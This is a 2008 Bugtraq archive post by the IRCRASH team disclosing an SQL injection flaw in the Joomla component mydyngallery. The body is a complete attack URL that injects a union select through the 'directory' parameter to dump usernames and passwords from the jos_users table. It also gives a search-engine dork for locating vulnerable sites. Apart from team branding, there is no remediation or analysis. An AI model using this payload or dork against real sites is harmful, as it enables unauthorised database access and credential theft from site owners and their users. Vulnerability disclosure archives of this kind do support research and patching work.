[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Joomla Component mydyngallery

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Joomla Component mydyngallery
From: r3d.w0rm@xxxxxxxxx
Date: Thu, 4 Dec 2008 13:33:03 -0700

#####################################################################################
####                      Joomla Component mydyngallery                         
 ####
#####################################################################################
#                                                                               
    #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                            
    #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                     
    #
#Our Site : Http://IRCRASH.COM                                                  
    #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi   
    #
#####################################################################################
#                                                                               
    #
#Download : http://mydyngallery.mon-cottenchy.fr                                
    #
#                                                                               
    #
#DORK : inurl:option=com_mydyngallery                                           
    #
#                                                                               
    #
#####################################################################################
#                                       [Bug]                                   
    #
#                                                                               
    #
#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*
#                                                                               
    #
#####################################################################################
#                           Site : Http://IRCRASH.COM                           
    #
###################################### TNX GOD 
######################################

Prev by Date: iDefense Security Advisory 12.04.08: Sun Java JRE TrueType Font Parsing Heap Overflow Vulnerability
Next by Date: iDefense Security Advisory 12.04.08: Sun Java Web Start GIF Decoding Memory Corruption Vulnerability
Previous by thread: iDefense Security Advisory 12.04.08: Sun Java JRE TrueType Font Parsing Heap Overflow Vulnerability
Next by thread: iDefense Security Advisory 12.04.08: Sun Java Web Start GIF Decoding Memory Corruption Vulnerability
Index(es):
- Date
- Thread